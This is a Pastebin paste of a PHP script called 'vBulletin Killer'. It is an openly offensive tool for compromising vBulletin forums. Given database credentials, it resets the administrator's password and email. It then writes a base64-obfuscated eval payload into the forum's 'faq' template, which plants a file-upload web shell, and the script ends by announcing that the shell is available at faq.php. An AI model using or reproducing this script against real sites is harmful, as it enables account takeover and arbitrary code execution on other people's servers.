API tools faq
paste
Advertisement
parkdream1

vBulletin Killer.php

parkdream1
Apr 16th, 2012
1,224
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.13 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <title>vBulletin Killer</title>
  3. <center>
  4. <form method=POST action=''>
  5. <font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost type=text name=hostname size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  6. <font face='Arial' color='#000000'>DB name<br></font><input value=forum type=text name=dbname size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  7. <font face='Arial' color='#000000'>DB user<br></font><input value=root type=text name=dbuser size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  8. <font face='Arial' color='#000000'>DB dbpass<br></font><input value=toor type=text name=dbpass size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  9. <font face='Arial' color='#000000'>Table prefix<br></font><input value='' type=text name=prefix size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  10. <font face='Arial' color='#000000'>User admin<br></font><input value=root type=text name=user size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  11. <font face='Arial' color='#000000'>New pass admin<br></font><input value=toor type=text name=pass size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  12. <font face='Arial' color='#000000'>New E-mail admin<br></font><input value=h3x4r@xgrvn.net type=text name=email size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  13. <font face='Arial' color='#000000'>Code Shell<br></font><textarea name="data" cols="40" rows="10">$spacer_open
  14. {${eval(base64_decode("aWYoaXNzZXQoJF9QT1NUWydTdWJtaXQnXSkpew0KICAgICRmaWxlZGlyID0gIiI7IA0KICAgICRtYXhmaWxlID0gJzIwMDAwMDAnOw0KDQogICAgJHVzZXJmaWxlX25hbWUgPSAkX0ZJTEVTWydpbWFnZSddWyduYW1lJ107DQogICAgJHVzZXJmaWxlX3RtcCA9ICRfRklMRVNbJ2ltYWdlJ11bJ3RtcF9uYW1lJ107DQogICAgaWYgKGlzc2V0KCRfRklMRVNbJ2ltYWdlJ11bJ25hbWUnXSkpIHsNCiAgICAgICAgJGFib2QgPSAkZmlsZWRpci4kdXNlcmZpbGVfbmFtZTsNCiAgICAgICAgQG1vdmVfdXBsb2FkZWRfZmlsZSgkdXNlcmZpbGVfdG1wLCAkYWJvZCk7DQogIA0KZWNobyI8Y2VudGVyPjxiPkRvbmUgPT0+ICR1c2VyZmlsZV9uYW1lPC9iPjwvY2VudGVyPiI7DQp9DQp9DQplbHNlew0KZWNobycNCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJpbWFnZSI+PGlucHV0IHR5cGU9IlN1Ym1pdCIgbmFtZT0iU3VibWl0IiB2YWx1ZT0iU3VibWl0Ij48L2Zvcm0+JzsNCn0="))}}{${exit()}}&
  15. $_phpinclude_output</textarea><br>
  16. <input type=submit value='Change' ><br>
  17. </form></center>
  18. </html>
  19. <?
  20. error_reporting(0);
  21. $hostname = $_POST['hostname'];
  22. $dbname  = $_POST['dbname'];
  23. $dbuser = $_POST['dbuser'];
  24. $dbpass  = $_POST['dbpass'];
  25. $user=str_replace("\'","'",$user);
  26. $set_user = $_POST['user'];
  27. $pass=str_replace("\'","'",$pass);
  28. $set_pass = $_POST['pass'];
  29. $email=str_replace("\'","'",$email);
  30. $set_email = $_POST['email'];
  31. $vb_prefix = $_POST['prefix'];
  32. $data = $_POST['data'];
  33. $set_data .= ("$data");
  34. $table_name = $vb_prefix."user";
  35. $table_name2 = $vb_prefix."template";
  36.  
  37. @mysql_connect($hostname,$dbuser,$dbpass);
  38. @mysql_select_db($dbname);
  39.  
  40. $query = 'select * from ' . $table_name . ' where username="' . $set_user . '";';
  41. $result = mysql_query($query);
  42. $row = mysql_fetch_array($result);
  43. $salt = $row['salt'];
  44. $pass1 = md5($set_pass);
  45. $pass2 = md5($pass1 . $salt);
  46.  
  47. $querry1 = 'UPDATE ' . $table_name . ' SET password="' . $pass2 . '" WHERE username="' . $set_user . '";';
  48. $querry2 = 'UPDATE ' . $table_name . ' SET email="' . $set_email . '" WHERE username="' . $set_user . '";';
  49. $querry3 = 'UPDATE ' . $table_name2 . ' SET template ="' . $set_data . '" WHERE title = "faq";';
  50.  
  51. $ok1=@mysql_query($querry1);
  52. $ok1=@mysql_query($querry2);
  53. $ok1=@mysql_query($querry3);
  54.  
  55. if($ok1){
  56. echo "<script>alert('vBulletin info changed and Shell available is faq.php :)');</script>";
  57. }
  58. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!